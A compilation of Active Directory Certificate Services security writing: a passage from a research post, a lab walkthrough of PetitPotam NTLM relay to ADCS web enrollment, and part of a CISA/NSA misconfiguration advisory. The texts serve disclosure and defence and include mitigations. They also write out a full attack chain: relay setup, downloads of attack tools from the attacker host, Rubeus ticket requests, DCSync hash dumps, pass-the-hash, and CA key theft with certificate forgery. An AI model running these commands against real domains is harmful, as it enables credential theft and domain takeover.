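Once the relayed enrollment returns a certificate for the victim machine account, the follow-on looks roughly like this with Rubeus. Host, file, and password names are placeholders, and the flags reflect Rubeus' documented asktgt/s4u usage:

# Request a TGT for the victim machine account using the stolen certificate
Rubeus.exe asktgt /user:VICTIM$ /certificate:victim.pfx /password:CertPfxPassword /ptt

# Use S4U2Self to obtain a service ticket to the victim host as a privileged user,
# substituting in the CIFS service for host access
Rubeus.exe s4u /self /impersonateuser:Administrator /altservice:cifs/victim.corp.local /user:VICTIM$ /ticket:<base64 TGT> /ptt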

In summary, if an environment has AD CS installed, along with a vulnerable web enrollment endpoint and at least one certificate template published that allows for domain computer enrollment and client authentication (like the default Machine/Computer template), then an attacker can compromise ANY computer with the spooler service running!

These attack scenarios work because some enrollment HTTP endpoints do not have HTTPS enabled and none of them have any NTLM relay protections enabled by default. Organizations should disable these HTTP-based enrollment server roles if they are not in use. Otherwise, network defenders can disable NTLM authentication using GPOs or by configuring the associated IIS applications to only accept Kerberos authentication. If organizations cannot remove the endpoints or outright disable NTLM authentication, they should only allow HTTPS traffic and configure the IIS applications to use Extended Protection for Authentication (EPA).

This specific issue was reported to MSRC, along with the other template escalation misconfigurations. The official response was, “We determined your finding is valid but does not meet our bar for a security update release.”

Note: While we have verified that this attack is possible, we are waiting to publicly demonstrate it at our Black Hat talk to help facilitate fixing the issue first.

Domain Persistence

Active Directory Enterprise CAs are hooked into the authentication system of AD and the CA root certificate private key is used to sign newly issued certificates. If we stole this private key, would we be able to forge our own certificates that could be used (without a smart card) to authenticate to Active Directory as anyone in the organization?

Spoiler: yes. And this has already been possible with Mimikatz/Kekeo for years. I guess we should call these golden certificates?

The certificate exists on the CA server itself, with its private key protected by machine DPAPI if a TPM/HSM is not used for hardware-based protection. If the key is not hardware protected, Mimikatz and SharpDPAPI can extract the CA certificate and private key from the CA:
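
For example, with local admin rights on the CA, the theft might look like the following. This is only a sketch: mimikatz' crypto module patches key export restrictions, and SharpDPAPI's certificates command triages machine DPAPI certificate keys, but exact arguments should be checked against each tool's help.

# In mimikatz (elevated): allow export of "non-exportable" keys, then dump machine certificates and keys
privilege::debug
crypto::capi
crypto::cng
crypto::certificates /systemstore:local_machine /store:my /export

# Or with SharpDPAPI (elevated): decrypt machine DPAPI masterkeys and pull certificate private keys
SharpDPAPI.exe certificates /machine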

With this key, you can create and sign new certificates for ANY user and use these forged certificates to authenticate to AD for as long as the CA cert is valid (default of 5 years, but often longer). Our tool ForgeCert (which will be released at Black Hat USA 2021 along with Certify) can perform these forgeries:
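
Expected usage is along these lines; parameter names are taken from our current build and may change before release, and all values below are placeholders:

# Forge a certificate for an arbitrary principal, signed by the stolen CA certificate/key
ForgeCert.exe --CaCertPath ca.pfx --CaCertPassword "CaPfxPassword" --Subject "CN=User" --SubjectAltName "administrator@corp.local" --NewCertPath admin.pfx --NewCertPassword "NewPfxPassword"

# The forged certificate can then be used for Kerberos authentication, e.g. with Rubeus
Rubeus.exe asktgt /user:administrator /certificate:admin.pfx /password:NewPfxPassword /ptt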

Oh, and these certs can’t be revoked, since they were never actually issued by the CA itself, as detailed by Benjamin Delpy.

Unfortunately, there isn’t a huge amount of public incident response guidance for AD CS. But if a root CA’s key is stolen, the entire AD CS system will likely need to be rebuilt, invalidating every issued certificate.

Defensive Advice

Not only are we self-embargoing the offensive tool release for these abuses, but we’ve also spent a large amount of effort researching both preventative and detective controls for these attacks. Part of the motivation for breaking out attacks and associated defensive protections with individual identifiers was to make the whitepaper material as digestible as possible for defenders.

Besides identifying and mitigating the privilege escalation vulnerabilities, something we want to emphasize from an incident response perspective is that it is not enough to reset a compromised user’s password and/or reimage their machine. Certificate theft is trivial in most environments given code execution in a user or computer context and would allow an attacker to authenticate to AD for years — even after the account’s password has been reset. Therefore, when an account or machine is compromised, incident responders should identify and invalidate any certificates associated with the compromised accounts as well. PSPKIAudit’s Get-CertRequest can help perform this type of triage.
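
A rough triage sketch follows; the cmdlet and parameter names reflect PSPKIAudit's current usage and may differ, and the CA config string for certutil is a placeholder:

# Pull issued certificate requests from the CA database and review what a compromised
# account has been issued (filter the output on the requester and/or SAN as needed)
Get-CertRequest -CAComputerName ca01.corp.local

# Revoke anything suspicious by serial number (reason 1 = Key Compromise), then publish a new CRL
certutil -config "ca01.corp.local\CORP-CA" -revoke <SerialNumber> 1
certutil -config "ca01.corp.local\CORP-CA" -crl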

As the defenses for these attacks are multi-pronged, at this point we’re recommending defenders study the attacks, read the extensive “Defensive Guidance” section of the whitepaper, and reference Microsoft’s Securing PKI documentation. Defenders can also try out PSPKIAudit’s Invoke-PKIAudit function to check for the misconfigurations described in this post:
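
A minimal sketch, assuming PSPKIAudit is installed and using a placeholder CA hostname:

# Import the toolkit and audit an enterprise CA (and its templates) for the misconfiguration classes above
Import-Module .\PSPKIAudit.psm1
Invoke-PKIAudit -CAComputerName ca01.corp.local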

Wrap-up

Even months into this research, we believed that there wasn’t necessarily anything inherently insecure about Active Directory Certificate Services. While the entire system is very dangerous if an organization doesn’t fully understand AD CS or its security implications (as it’s extremely easy to misconfigure) there didn’t appear to be any “out of the box” vulnerabilities. That said, we have seen a proliferation of the ESC1–7 elevation issues in real environments since we began looking in January 2021. We feel administrators have been given a powerful weapon with the safety off for 20 years and there’s been little safety training. An attitude of, “Well, admins should have known better” in this scenario, without even providing a way to audit or investigate these issues programmatically from a defensive context, is, well, a position we suppose.

However, beyond the template misconfiguration scenarios, the ESC8 relay situation is a serious security issue. We reported this relay issue to MSRC on May 19th along with all domain escalation scenarios, and received a response on June 8th of “We determined your finding is valid but does not meet our bar for a security update release. We considered that servers with AD CS roles could mitigate this risk with a change in configuration settings to enable Extended Protection for Authentication (EPA), per this blog post.” MSRC stated that they also opened up a bug concerning the template issues and our comments about poor telemetry with the AD CS feature team, who may consider additional design changes in a future release.

To be clear, based on our research, if you are running AD CS with ANY template a domain computer can enroll in that also allows domain authentication (e.g., the Machine/Computer template that is available by default), ANY system running the spooler service can be compromised. Based on our extensive experience assessing AD environments, we believe this is very bad. If you find you are vulnerable to this, consider contacting your nearest Microsoft representative and question them as to why this insecure default configuration is allowed. As of right now, they have no intentions of directly servicing the issue, but said they may fix it at some indeterminate future date.

From a defensive perspective, you should immediately enumerate the Web Enrollment interfaces enabled in your environment (possible with PSPKIAudit) and then either remove them, disable NTLM authentication to them, or enforce HTTPS and enable EPA on the IIS server component. For specifics on how to do this, please see “Defensive Guidance — Harden AD CS HTTP Endpoints — PREVENT8” in the whitepaper. We also strongly recommend organizations audit their AD CS architecture and certificate templates and treat CA servers (including subordinate CAs) as Tier 0 assets with the same protections as Domain Controllers! The “Defensive Guidance” section of the whitepaper has more information on how to proactively prevent, detect, and respond to the attacks we’ve detailed.

Yes, we’re working to integrate the escalation paths into BloodHound, but as you can see this whole thing is rather complicated, and we want to get it right. But rest assured, it’s under active development and will be released in FOSS BloodHound.

And finally, as a disclaimer, we are not stating that we know every security issue concerning AD CS. We took our best shot in this research, but we are confident that there are additional issues and attacker tradecraft implications that we (or others) will find in the coming months, or things we have missed.

Acknowledgements

As is almost always the case, we’re standing on a number of shoulders with this research; the whitepaper gives a more complete treatment of the prior work we build on.

Special thanks to Mark Gamache for collaborating with us on parts of this work. He independently discovered many of these abuses, reached out to us, and brought many additional details to our attention while we were performing this research.

As always, we tried our best to cite the existing work out there that we came across, but we’re sure we missed things.

Source:

https://posts.specterops.io/certified-pre-owned-d95910965cd2

Domain Escalation: PetitPotam NTLM Relay to ADCS Endpoints

February 25, 2022
By Raj Chandel

Introduction

Will Schroeder and Lee Christensen wrote a research paper on this technique, which can be referred to here. In the ESC8 technique described in the paper, they talked about an inherent vulnerability in the web interface of a CA server with the web enrolment service enabled. An attacker can therefore relay coerced authentication to the web interface, request a certificate for the Domain Controller machine account (DC$), and gain escalation and persistence. PetitPotam is one such PoC tool, developed by Lionel Gilles (found here), that can coerce a Windows host into authenticating to an attacker-controlled listener, which can then be used to request certificates and gain escalation.

Table of Contents

  • Vulnerability
  • Architecture
  • Lab Setup
  • Attack Demonstration
  • Initial Compromise
  • Certificate Generation – PetitPotam Python script
  • Certificate Generation – PetitPotam.exe
  • Certificate Generation – Mimikatz
  • Privilege Escalation
    • TGT generation
    • DCSync attack
    • PassTheHash attack
  • Mitigation
  • Conclusion

 Vulnerability

AD CS supports several HTTP-based enrollment methods via additional AD CS server roles that administrators can install. These enrolment interfaces are vulnerable to NTLM relay attacks. The web endpoints do not have NTLM relay protections enabled by default and hence, are vulnerable by default. Flow of the vulnerability is as follows:

  • The attack coerces/forces a Domain Controller Machine Account (workstation01$ in our case) to authenticate towards our NTLM relay setup (Kali in our case).
  • Workstation01$ account authentication request is forwarded to NTLM relay server (kali).
  • Workstation01$ account authentication relayed to CA Server or ADCS (Active Directory Certificate Service).
  • Generate Certificate
  • Use the certificate to perform attacks (like DCSync) to compromise DC1$ (CA server)

How do we force authentication? => If an attacker is patient, he can wait for organic authentication. But we don’t have that much time so we need to force authentication. One such method is the famous “Printer Bug.” But it depends on the print spooler service to be running and vulnerable. Therefore, Lionel Gilles created “PetitPotam” which initially leveraged the vulnerable EfsRpcOpenFileRaw function in MS-EFSR protocol that had an insufficient path check vulnerability. By using this, attackers can make forced/coerced authentications over SMB thus increasing NTLM relay’s capabilities. Since then, many newer functions have been added to the PetitPotam tool.

Architecture

CA server with Web Enrollment – DC1$: 192.168.1.2

Domain Controller – workstation01$: 192.168.1.3

Attacker Kali – Not in domain: 192.168.1.4

Attacker Windows – Not in domain: random IP (non-domain joined but DNS pointing to CA IP)

Lab Setup

On the Windows Server where ADCS is already configured, go to the server manager and choose to add roles and features and add the following three roles:

  • CA Web Enrolment
  • Certificate Enrolment Web Service
  • Network Device Enrolment Service

As you can see, on my server (dc1.ignite.local) I have already installed these. I didn’t change any configuration and kept everything to default.

We can open Internet Explorer and browse to the following link to check whether certificate web enrolment is running:

http://dc1.ignite.local/certsrv/

And finally, you need to set up a separate Domain Controller on a different machine, as I have. In most scenarios the DC and CA are the same server, but for the sake of simplicity I have made them different. As you can see, the DC machine has a machine account called "Workstation01" which is in the Domain Controllers group.

Attack Demonstration

The demonstration is divided into five parts: initial compromise, three methods to generate the certificate, and privilege escalation.

Initial Compromise

Since this is a domain escalation attack, we first need access to a victim system. Here, I have compromised a computer associated with the workstation01$ account. As the command below shows, workstation01$ is in the Domain Controllers group, meaning the system we want to reach is a DC that we do not yet have privileged access to.

net group "domain controllers" /domain

Our aim: generate a certificate for the DC machine account, use it to authenticate to the domain, and escalate privileges.

Compromised Credentials: Harshit:Password@1

Before we generate a certificate for this DC account, we need to set up our NTLM relay. We can do this using Impacket’s python script ntlmrelayx.py

ntlmrelayx.py -t http://192.168.1.2/certsrv/certfnsh.asp -smb2support --adcs --template DomainController

Certificate Generation – PetitPotam Python script

PetitPotam can be downloaded from the official GitHub repo here. Running the script is quite easy: you just need to specify the domain, the credentials of the compromised user, and the IP of the NTLM relay host (Kali), followed by the IP of the DC.

git clone https://github.com/topotam/PetitPotam

cd PetitPotam

python3 PetitPotam.py -d ignite.local -u harshit -p Password@1 192.168.1.4 192.168.1.3

If everything goes well, you will see the script report Sending EfsRpcOpenFileRaw and Attack Successful!

This should have generated the certificate for DC machine account Workstation01$ in the NTLM relay console. A few things to observe here are:

  • Authentication succeeded: means that the certificate web enrolment endpoint was successfully reached for a machine account (the vulnerable web enrolment interface), triggered with nothing more than a low-privileged user’s credentials.
  • Attack from 192.168.1.3 controlled, attacking target 192.168.1.2: means that the relay has successfully forwarded the request to the CA server and a certificate will be generated for the DC account workstation01$.

You can copy this certificate into a text file.

Before we move on to the actual privilege escalation steps, I’d like to show you two more methods that achieve the same result as what we did just now.

Certificate Generation – PetitPotam.exe

The official GitHub repo also comes with a PetitPotam.exe binary. You can upload this file to the victim server and execute it to get the same results. If you see a slight pause and then an Attack success!!! status, you have generated the DC account’s certificate. In the PetitPotam.exe command, “1” triggers the exploit using the default EfsRpcOpenFileRaw function vulnerability; other vulnerable functions have been added by the author too.

powershell wget http://192.168.1.4/PetitPotam.exe -O PetitPotam.exe

PetitPotam.exe 192.168.1.4 192.168.1.3 1

Certificate Generation – Mimikatz

As people of culture, we like to add new exploits to our favourite mimikatz. EfsRpcOpenFileRaw function vulnerability can be triggered using mimikatz too. We just need to upload this to our victim’s server and execute the following command.

/connect: NTLM relay IP

/server: dc_account.domain.fqdn

powershell wget http://192.168.1.4/mimikatz.exe -O mimikatz.exe

misc::efs /server:workstation01.ignite.local /connect:192.168.1.4

All of the above methods yield the same certificate as a result. Now, let’s escalate our privileges.

Privilege Escalation

TGT generation

To demonstrate this step, we need a new Windows 10 system that is not in the domain. We set up a local admin account on this system and change its DNS to point to the DC.

Now that we have the DC certificate with us, we need to translate it into a more useful means of access. Let’s generate a TGT using Rubeus first. The asktgt module in Rubeus can do that, taking the generated certificate as command-line input. The command is as follows:

.\Rubeus.exe asktgt /outfile:kirbi /dc:192.168.1.2 /domain:ignite.local /user:workstation01 /ptt /certificate:MIIRdQIBAz…..

Kirbi is a base64 encoded TGT format used by Rubeus.

As you can see with the klist command, a TGT has been created and saved in the system for further use.

DCSync Attack

Using mimikatz, we can leverage this ticket to conduct a DCSync attack. First, let’s dump the krbtgt account’s hashes.

lsadump::dcsync /domain:ignite.local /user:krbtgt

Now, an attacker can use these credentials and the SID provided to perform a Golden Ticket attack (for persistence). Details can be found here. But at the moment we are concerned with admin access to the CA server (the DC1$ machine account). Let’s run DCSync one more time on the administrator account.

lsadump::dcsync /domain:ignite.local /user:administrator

As you can see, we have now obtained the NTLM hash of the Administrator account. Let us use psexec to gain a healthy shell now by conducting a PassTheHash attack.

PassTheHash Attack

To conduct PassTheHash, we will use Impacket’s psexec.py implementation and the following command:

psexec.py -hashes :32196b56ffe6f45e294117b91a83bf38 ignite.local/administrator@192.168.1.2

And voila! That’s it. You can see that we have now compromised the CA server (DC1$) just by leveraging the ADCS web enrolment vulnerability and the credentials of a low-privileged user.

Mitigation

Microsoft has rolled out a detailed advisory on the necessary patches and mitigations, which can be found here. I’ll sum it up briefly:

  • Enable "Require SSL" on the certsrv site (IIS Manager -> Default Web Site -> certsrv -> SSL Settings).
  • Enable Extended Protection for Windows Authentication (certsrv -> Authentication -> Windows Authentication -> Advanced Settings).
  • Disable NTLM for IIS on the ADCS server by restricting the Windows Authentication providers for certsrv to Negotiate:Kerberos.
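
For reference, the first two settings can also be scripted with appcmd from an elevated command prompt on the ADCS/IIS host. This is only a sketch; the site path "Default Web Site/CertSrv" and the attribute values should be verified against Microsoft's KB5021989 guidance for your environment:

# Require SSL on the CertSrv application
%windir%\system32\inetsrv\appcmd.exe set config "Default Web Site/CertSrv" -section:system.webServer/security/access /sslFlags:"Ssl" /commit:apphost

# Require Extended Protection for Windows Authentication on CertSrv
%windir%\system32\inetsrv\appcmd.exe set config "Default Web Site/CertSrv" -section:system.webServer/security/authentication/windowsAuthentication /extendedProtection.tokenChecking:"Require" /extendedProtection.flags:"None" /commit:apphost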

 Conclusion

Certified Pre-Owned is a valuable whitepaper focusing on various ADCS vulnerabilities, and through our blog we aim to create awareness about these attacks so that organisations can understand, detect, and patch such often-overlooked weaknesses. Hope you liked the article. Thanks for reading.

Author: Harshit Rajpal is an InfoSec researcher and left and right brain thinker. Contact here

Source:
https://www.hackingarticles.in/domain-escalation-petitpotam-ntlm-relay-to-adcs-endpoints/

NSA and CISA Red and Blue Teams Share Top Ten Cybersecurity Misconfigurations

Release Date October 05, 2023
Alert Code: AA23-278A

A plea for network defenders and software manufacturers to fix common problems.

EXECUTIVE SUMMARY

The National Security Agency (NSA) and Cybersecurity and Infrastructure Security Agency (CISA) are releasing this joint cybersecurity advisory (CSA) to highlight the most common cybersecurity misconfigurations in large organizations, and detail the tactics, techniques, and procedures (TTPs) actors use to exploit these misconfigurations.

Through NSA and CISA Red and Blue team assessments, as well as through the activities of NSA and CISA Hunt and Incident Response teams, the agencies identified the following 10 most common network misconfigurations:

  1. Default configurations of software and applications
  2. Improper separation of user/administrator privilege
  3. Insufficient internal network monitoring
  4. Lack of network segmentation
  5. Poor patch management
  6. Bypass of system access controls
  7. Weak or misconfigured multifactor authentication (MFA) methods
  8. Insufficient access control lists (ACLs) on network shares and services
  9. Poor credential hygiene
  10. Unrestricted code execution

These misconfigurations illustrate (1) a trend of systemic weaknesses in many large organizations, including those with mature cyber postures, and (2) the importance of software manufacturers embracing secure-by-design principles to reduce the burden on network defenders:

  • Properly trained, staffed, and funded network security teams can implement the known mitigations for these weaknesses.
  • Software manufacturers must reduce the prevalence of these misconfigurations—thus strengthening the security posture for customers—by incorporating secure-by-design and -default principles and tactics into their software development practices.[1]

NSA and CISA encourage network defenders to implement the recommendations found within the Mitigations section of this advisory—including the following—to reduce the risk of malicious actors exploiting the identified misconfigurations.

  • Remove default credentials and harden configurations.
  • Disable unused services and implement access controls.
  • Update regularly and automate patching, prioritizing patching of known exploited vulnerabilities.[2]
  • Reduce, restrict, audit, and monitor administrative accounts and privileges.

NSA and CISA urge software manufacturers to take ownership of improving security outcomes of their customers by embracing secure-by-design and -default tactics, including:

  • Embedding security controls into product architecture from the start of development and throughout the entire software development lifecycle (SDLC).
  • Eliminating default passwords.
  • Providing high-quality audit logs to customers at no extra charge.
  • Mandating MFA, ideally phishing-resistant, for privileged users and making MFA a default rather than opt-in feature.[3]

TECHNICAL DETAILS

Note: This advisory uses the MITRE ATT&CK® for Enterprise framework, version 13, and the MITRE D3FEND™ cybersecurity countermeasures framework.[4],[5] See the Appendix: MITRE ATT&CK tactics and techniques section for tables summarizing the threat actors’ activity mapped to MITRE ATT&CK tactics and techniques, and the Mitigations section for MITRE D3FEND countermeasures.

For assistance with mapping malicious cyber activity to the MITRE ATT&CK framework, see CISA and MITRE ATT&CK’s Best Practices for MITRE ATT&CK Mapping and CISA’s Decider Tool.[6],[7]

Overview

Over the years, the following NSA and CISA teams have assessed the security posture of many network enclaves across the Department of Defense (DoD); Federal Civilian Executive Branch (FCEB); state, local, tribal, and territorial (SLTT) governments; and the private sector:

  • Depending on the needs of the assessment, NSA Defensive Network Operations (DNO) teams feature capabilities from Red Team (adversary emulation), Blue Team (strategic vulnerability assessment), Hunt (targeted hunt), and/or Tailored Mitigations (defensive countermeasure development).
  • CISA Vulnerability Management (VM) teams have assessed the security posture of over 1,000 network enclaves. CISA VM teams include Risk and Vulnerability Assessment (RVA) and CISA Red Team Assessments (RTA).[8] The RVA team conducts remote and onsite assessment services, including penetration testing and configuration review. RTA emulates cyber threat actors in coordination with an organization to assess the organization’s cyber detection and response capabilities.
  • CISA Hunt and Incident Response teams conduct proactive and reactive engagements, respectively, on organization networks to identify and detect cyber threats to U.S. infrastructure.

During these assessments, NSA and CISA identified the 10 most common network misconfigurations, which are detailed below. These misconfigurations (non-prioritized) are systemic weaknesses across many networks.

Many of the assessments were of Microsoft® Windows® and Active Directory® environments. This advisory provides details about, and mitigations for, specific issues found during these assessments, and so mostly focuses on these products. However, it should be noted that many other environments contain similar misconfigurations. Network owners and operators should examine their networks for similar misconfigurations even when running other software not specifically mentioned below.

1. Default Configurations of Software and Applications

Default configurations of systems, services, and applications can permit unauthorized access or other malicious activity. Common default configurations include:

  • Default credentials
  • Default service permissions and configuration settings

Default Credentials

Many software manufacturers release commercial off-the-shelf (COTS) network devices —which provide user access via applications or web portals—containing predefined default credentials for their built-in administrative accounts.[9] Malicious actors and assessment teams regularly abuse default credentials by:

  • Finding credentials with a simple web search [T1589.001] and using them [T1078.001] to gain authenticated access to a device.
  • Resetting built-in administrative accounts [T1098] via predictable forgotten passwords questions.
  • Leveraging default virtual private network (VPN) credentials for internal network access [T1133].
  • Leveraging publicly available setup information to identify built-in administrative credentials for web applications and gaining access to the application and its underlying database.
  • Leveraging default credentials on software deployment tools [T1072] for code execution and lateral movement.

In addition to devices that provide network access, printers, scanners, security cameras, conference room audiovisual (AV) equipment, voice over internet protocol (VoIP) phones, and internet of things (IoT) devices commonly contain default credentials that can be used for easy unauthorized access to these devices as well. Further compounding this problem, printers and scanners may have privileged domain accounts loaded so that users can easily scan documents and upload them to a shared drive or email them. Malicious actors who gain access to a printer or scanner using default credentials can use the loaded privileged domain accounts to move laterally from the device and compromise the domain [T1078.002].

Default Service Permissions and Configuration Settings

Certain services may have overly permissive access controls or vulnerable configurations by default. Additionally, even if the providers do not enable these services by default, malicious actors can easily abuse these services if users or administrators enable them.

Assessment teams regularly find the following:

  • Insecure Active Directory Certificate Services
  • Insecure legacy protocols/services
  • Insecure Server Message Block (SMB) service

Insecure Active Directory Certificate Services

Active Directory Certificate Services (ADCS) is a feature used to manage Public Key Infrastructure (PKI) certificates, keys, and encryption inside of Active Directory (AD) environments. ADCS templates are used to build certificates for different types of servers and other entities on an organization’s network.

Malicious actors can exploit ADCS and/or ADCS template misconfigurations to manipulate the certificate infrastructure into issuing fraudulent certificates and/or escalate user privileges to domain administrator privileges. These certificates and domain escalation paths may grant actors unauthorized, persistent access to systems and critical data, the ability to impersonate legitimate entities, and the ability to bypass security measures.

Assessment teams have observed organizations with the following misconfigurations:

  • ADCS servers running with web-enrollment enabled. If web-enrollment is enabled, unauthenticated actors can coerce a server to authenticate to an actor-controlled computer, which can relay the authentication to the ADCS web-enrollment service and obtain a certificate [T1649] for the server’s account. These fraudulent, trusted certificates enable actors to use adversary-in-the-middle techniques [T1557] to masquerade as trusted entities on the network. The actors can also use the certificate for AD authentication to obtain a Kerberos Ticket Granting Ticket (TGT) [T1558.001], which they can use to compromise the server and usually the entire domain.
  • ADCS templates where low-privileged users have enrollment rights, and the enrollee supplies a subject alternative name. Misconfiguring various elements of ADCS templates can result in domain escalation by unauthorized users (e.g., granting low-privileged users certificate enrollment rights, allowing requesters to specify a subjectAltName in the certificate signing request [CSR], not requiring authorized signatures for CSRs, granting FullControl or WriteDacl permissions to users). Malicious actors can use a low-privileged user account to request a certificate with a particular Subject Alternative Name (SAN) and gain a certificate where the SAN matches the User Principal Name (UPN) of a privileged account.

Note: For more information on known escalation paths, including PetitPotam NTLM relay techniques, see: Domain Escalation: PetitPotam NTLM Relay to ADCS Endpoints and Certified Pre-Owned, Active Directory Certificate Services.[10],[11],[12]
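
As a concrete illustration of the second misconfiguration, a low-privileged user could request a certificate with an arbitrary SAN using a tool such as Certify; the CA, template, and target account names below are hypothetical:

# Request a certificate from a template that allows enrollee-supplied subjects,
# setting the SAN to a privileged account's UPN
Certify.exe request /ca:CA01.corp.local\CORP-CA /template:VulnerableTemplate /altname:administrator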

Insecure legacy protocols/services

Many vulnerable network services are enabled by default, and assessment teams have observed them enabled in production environments. Specifically, assessment teams have observed Link-Local Multicast Name Resolution (LLMNR) and NetBIOS Name Service (NBT-NS), which are Microsoft Windows components that serve as alternate methods of host identification. If these services are enabled in a network, actors can use spoofing, poisoning, and relay techniques [T1557.001] to obtain domain hashes, system access, and potential administrative system sessions. Malicious actors frequently exploit these protocols to compromise entire Windows environments.

Malicious actors can spoof an authoritative source for name resolution on a target network by responding to passing traffic, effectively poisoning the service so that target computers will communicate with an actor-controlled system instead of the intended one. If the requested system requires identification/authentication, the target computer will send the user’s username and hash to the actor-controlled system. The actors then collect the hash and crack it offline to obtain the plain text password [T1110.002].
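
If these protocols are not required, they can be turned off centrally via group policy; for illustration, the equivalent local changes look roughly like this (run elevated, and ideally deploy via GPO rather than per host):

# Disable LLMNR (DNS Client policy: EnableMulticast = 0)
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient" /v EnableMulticast /t REG_DWORD /d 0 /f

# Disable NetBIOS over TCP/IP on every interface (NetbiosOptions 2 = disabled)
Get-ChildItem "HKLM:\SYSTEM\CurrentControlSet\Services\NetBT\Parameters\Interfaces" |
    ForEach-Object { Set-ItemProperty -Path $_.PSPath -Name NetbiosOptions -Value 2 }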

Insecure Server Message Block (SMB) service

The Server Message Block service is a Windows component primarily for file sharing. Its default configuration, including in the latest version of Windows, does not require signing network messages to ensure authenticity and integrity. If SMB servers do not enforce SMB signing, malicious actors can use machine-in-the-middle techniques, such as NTLM relay. Further, malicious actors can combine a lack of SMB signing with the name resolution poisoning issue (see above) to gain access to remote systems [T1021.002] without needing to capture and crack any hashes.
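
On Windows hosts, signing can be enforced with the SMB configuration cmdlets (or the equivalent "Digitally sign communications (always)" group policy settings); a brief sketch:

# Require signing for inbound SMB sessions served by this host
Set-SmbServerConfiguration -RequireSecuritySigning $true -Force

# Require signing for outbound SMB sessions from this host
Set-SmbClientConfiguration -RequireSecuritySigning $true -Force

# Verify the server-side setting
Get-SmbServerConfiguration | Select-Object RequireSecuritySigning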

2. Improper Separation of User/Administrator Privilege

Administrators often assign multiple roles to one account. These accounts have access to a wide range of devices and services, allowing malicious actors to move through a network quickly with one compromised account without triggering lateral movement and/or privilege escalation detection measures.

Assessment teams have observed the following common account separation misconfigurations:

  • Excessive account privileges
  • Elevated service account permissions
  • Non-essential use of elevated accounts

Excessive Account Privileges

Account privileges are intended to control user access to host or application resources to limit access to sensitive information or enforce a least-privilege security model. When account privileges are overly permissive, users can see and/or do things they should not be able to, which becomes a security issue as it increases risk exposure and attack surface.

Expanding organizations can undergo numerous changes in account management, personnel, and access requirements. These changes commonly lead to privilege creep—the granting of excessive access and unnecessary account privileges. Through the analysis of topical and nested AD groups, a malicious actor can find a user account [T1078] that has been granted account privileges that exceed their need-to-know or least-privilege function. Extraneous access can lead to easy avenues for unauthorized access to data and resources and escalation of privileges in the targeted domain.

Elevated Service Account Permissions

Applications often operate using user accounts to access resources. These user accounts, which are known as service accounts, often require elevated privileges. When a malicious actor compromises an application or service using a service account, they will have the same privileges and access as the service account.

Malicious actors can exploit elevated service permissions within a domain to gain unauthorized access and control over critical systems. Service accounts are enticing targets for malicious actors because such accounts are often granted elevated permissions within the domain due to the nature of the service, and because access to use the service can be requested by any valid domain user. Due to these factors, kerberoasting—a form of credential access achieved by cracking service account credentials—is a common technique used to gain control over service account targets [T1558.003].
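
Defenders can get a quick view of their kerberoasting exposure by listing user accounts with registered service principal names, then ensuring those accounts use long, random passwords (or are migrated to group managed service accounts). A sketch using the ActiveDirectory PowerShell module:

# Enumerate user accounts with SPNs (i.e., kerberoastable accounts) and when their passwords last changed
Get-ADUser -Filter 'ServicePrincipalName -like "*"' -Properties ServicePrincipalName, PasswordLastSet |
    Select-Object Name, PasswordLastSet, @{n='SPNs';e={$_.ServicePrincipalName -join '; '}}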

Non-Essential Use of Elevated Accounts

IT personnel use domain administrator and other administrator accounts for system and network management due to their inherent elevated privileges. When an administrator account is logged into a compromised host, a malicious actor can steal and use the account’s credentials and an AD-generated authentication token [T1528] to move, using the elevated permissions, throughout the domain [T1550.001]. Using an elevated account for normal day-to-day, non-administrative tasks increases the account’s exposure and, therefore, its risk of compromise and its risk to the network.

Malicious actors prioritize obtaining valid domain credentials upon gaining access to a network. Authentication using valid domain credentials allows the execution of secondary enumeration techniques to gain visibility into the target domain and AD structure, including discovery of elevated accounts and where the elevated accounts are used [T1087].

Targeting elevated accounts (such as domain administrator or system administrators) performing day-to-day activities provides the most direct path to achieve domain escalation. Systems or applications accessed by the targeted elevated accounts significantly increase the attack surface available to adversaries, providing additional paths and escalation options.

After obtaining initial access via an account with administrative permissions, an assessment team compromised a domain in under a business day. The team first gained initial access to the system through phishing [T1566], by which they enticed the end user to download [T1204] and execute malicious payloads. The targeted end-user account had administrative permissions, enabling the team to quickly compromise the entire domain.

3. Insufficient Internal Network Monitoring

Some organizations do not optimally configure host and network sensors for traffic collection and end-host logging. These insufficient configurations could lead to undetected adversarial compromise. Additionally, improper sensor configurations limit the traffic collection capability needed for enhanced baseline development and detract from timely detection of anomalous activity.

Assessment teams have exploited insufficient monitoring to gain access to assessed networks. For example:

  • An assessment team observed an organization with host-based monitoring, but no network monitoring. Host-based monitoring informs defensive teams about adverse activities on singular hosts and network monitoring informs about adverse activities traversing hosts [TA0008]. In this example, the organization could identify infected hosts but could not identify where the infection was coming from, and thus could not stop future lateral movement and infections.
  • An assessment team gained persistent deep access to a large organization with a mature cyber posture. The organization did not detect the assessment team’s lateral movement, persistence, and command and control (C2) activity, including when the team attempted noisy activities to trigger a security response. For more information on this activity, see CSA CISA Red Team Shares Key Findings to Improve Monitoring and Hardening of Networks.[13]

4. Lack of Network Segmentation

Network segmentation separates portions of the network with security boundaries. Lack of network segmentation leaves no security boundaries between the user, production, and critical system networks. Insufficient network segmentation allows an actor who has compromised a resource on the network to move laterally across a variety of systems uncontested. Lack of network segregation additionally leaves organizations significantly more vulnerable to potential ransomware attacks and post-exploitation techniques.

Lack of segmentation between IT and operational technology (OT) environments places OT environments at risk. For example, assessment teams have often gained access to OT networks—despite prior assurance that the networks were fully air gapped, with no possible connection to the IT network—by finding special purpose, forgotten, or even accidental network connections [T1199].

5. Poor Patch Management

Vendors release patches and updates to address security vulnerabilities. Poor patch management and network hygiene practices often enable adversaries to discover open attack vectors and exploit critical vulnerabilities. Poor patch management includes:

  • Lack of regular patching
  • Use of unsupported operating systems (OSs) and outdated firmware

Lack of Regular Patching

Failure to apply the latest patches can leave a system open to compromise from publicly available exploits. Due to their ease of discovery—via vulnerability scanning [T1595.002] and open source research [T1592]—and exploitation, these systems are immediate targets for adversaries. Allowing critical vulnerabilities to remain on production systems without applying their corresponding patches significantly increases the attack surface. Organizations should prioritize patching known exploited vulnerabilities in their environments.[2]

Assessment teams have observed threat actors exploiting many CVEs in public-facing applications [T1190], including:

  • CVE-2019-18935 in an unpatched instance of Telerik® UI for ASP.NET running on a Microsoft IIS server.[14]
  • CVE-2021-44228 (Log4Shell) in an unpatched VMware® Horizon server.[15]
  • CVE-2022-24682, CVE-2022-27924, and CVE-2022-27925 chained with CVE-2022-37042, or CVE-2022-30333 in an unpatched Zimbra® Collaboration Suite.[16]

Use of Unsupported OSs and Outdated Firmware

